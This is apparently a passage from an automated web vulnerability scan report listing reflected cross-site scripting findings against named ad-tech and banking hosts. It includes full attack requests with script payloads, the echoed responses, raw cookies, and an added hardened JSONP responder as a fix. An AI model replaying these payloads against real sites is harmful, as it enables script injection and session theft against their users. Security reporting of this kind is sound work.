Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 4368
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:26 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:25 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Customers.GetCustomerResponse","payload":"{\"objectType\":\"Customers.GetCustomerResponse\",\"isError\":false,\"TTL\":0,\"requestedBy
...[SNIP]...

1.428. http://pluckit.demandmedia.com/requests [jsonpContext parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the jsonpContext request parameter is copied into a single-quoted JavaScript string literal that is passed as the second argument of the JSONP callback (the ,'request_...') at the end of the response). The payload 6b2fe<script>alert(1)</script>7d41626bf96 was submitted in the jsonpContext parameter and was echoed unmodified in the application's response.

As with jpctx in finding 1.425, the payload contains no single quote and so remains inside the literal; the tag executes only if the response is rendered as HTML. A single quote in jsonpContext would close the literal in this context, which is what to confirm when triaging. The fix is to emit the context as a JSON string rather than concatenating it between quotes.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_4423813743186b2fe<script>alert(1)</script>7d41626bf96&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 4388
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:29 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:28 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Customers.GetCustomerResponse","payload":"{\"objectType\":\"Custo
...[SNIP]...
11a033338c2&t=' + trEscae8b1b2cb1(document.title) + '&r=' + trEscae8b1b2cb1(document.referrer);\r\n})();\r\n//]]>\r\n","ContentTrackingSrc":"","diagnostics":null,"requestedBy":""},'request_4423813743186b2fe<script>alert(1)</script>7d41626bf96');
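
The jpcb, jpctx, apiKey, jsonpCallback and jsonpContext findings above share one root cause: the callback name and the context string are spliced into the script body without validation or encoding. The following is an added example of a hardened JSONP responder, written for this report and not taken from Pluck's or Demand Media's code; the function names, the 128-character limit and the allowed callback grammar are assumptions. It accepts the legitimate callback shapes seen in the requests above (PluckSDKjpcb and dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback), rejects the scanner's payloads, serializes the context argument as JSON instead of concatenating it between quotes, and sends headers that stop a browser from treating the script as HTML.

```javascript
// Added example: hardened JSONP responder for endpoints shaped like
// /ver1.0/daapi2.api and /requests in the findings above.
// Function names, the length limit and the callback grammar are assumptions.

const IDENT = "[A-Za-z_$][\\w$]*";
// Allowed callback grammar: an identifier, followed by any number of dotted
// members or bracket accesses with a quoted identifier key. This is exactly
// what dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback
// needs; angle brackets, parentheses, semicolons and spaces never match.
const CALLBACK_RE = new RegExp(
  `^${IDENT}(?:\\.${IDENT}|\\['${IDENT}'\\]|\\["${IDENT}"\\])*$`
);
const MAX_CALLBACK_LEN = 128; // assumption: generous upper bound

// Allowlist check for the callback name (jpcb / jsonpCallback).
function isValidJsonpCallback(name) {
  return typeof name === "string" &&
    name.length <= MAX_CALLBACK_LEN &&
    CALLBACK_RE.test(name);
}

// JSON-encode a value and additionally escape the characters that let a
// JSON string break out of a <script> block or be mis-parsed as JavaScript.
// U+2028/U+2029 are legal inside JSON strings but are line terminators in JS.
function safeJson(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

// Build the HTTP response for one JSONP request. The context argument
// (jpctx / jsonpContext) is never concatenated raw between quotes; it is
// serialized with safeJson, so quotes and angle brackets cannot break out.
function buildJsonpResponse(callback, context, payload) {
  const headers = {
    "Content-Type": "application/javascript; charset=utf-8",
    // Stops content sniffing from treating the script body as HTML.
    "X-Content-Type-Options": "nosniff",
    "Cache-Control": "no-store",
  };
  if (!isValidJsonpCallback(callback)) {
    return { status: 400, headers, body: safeJson({ error: "invalid callback" }) };
  }
  // A leading comment keeps the attacker from controlling the first bytes of
  // the response (Rosetta Flash style abuse of a JSONP endpoint).
  const body = `/**/${callback}(${safeJson(payload)},${safeJson(context)});`;
  return { status: 200, headers, body };
}

// Usage: the jpctx payload from finding 1.425 comes back as a JSON string
// with < and > escaped, and the jpcb payload is rejected with a 400.
const demo = buildJsonpResponse(
  "PluckSDKjpcb",
  "request_0fa896<script>alert(1)</script>11222906e44",
  { Envelopes: [] }
);
console.log(demo.status, demo.body);
```

The allowlist, not the encoding, is what closes the callback-name findings: there is no encoding that makes an arbitrary string a safe function name, so the name must be rejected outright when it is not one. The escaped JSON and the nosniff header cover the context-string and content-sniffing cases.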

1.429. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6506f"><script>alert(1)</script>91c27bc8e67 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6506f"><script>alert(1)</script>91c27bc8e67&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29ST
FT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; 
rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:02:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=8310709099384096523&fpid=6506f"><script>alert(1)</script>91c27bc8e67&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.430. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38030"><script>alert(1)</script>3e8a29e1991 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=38030"><script>alert(1)</script>3e8a29e1991&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29ST
FT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; 
rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:02:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2664611420216086048&fpid=4&nu=n&t=&sp=38030"><script>alert(1)</script>3e8a29e1991&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.431. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wachovia.com
Path:   /selfservice/microsites/wachoviaSearchEntry.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef9"><script>alert(1)</script>6d3f3e1bc4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selfservice/microsites/wachoviaSearchEntry.do?aaef9"><script>alert(1)</script>6d3f3e1bc4b=1 HTTP/1.1
Host: search.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

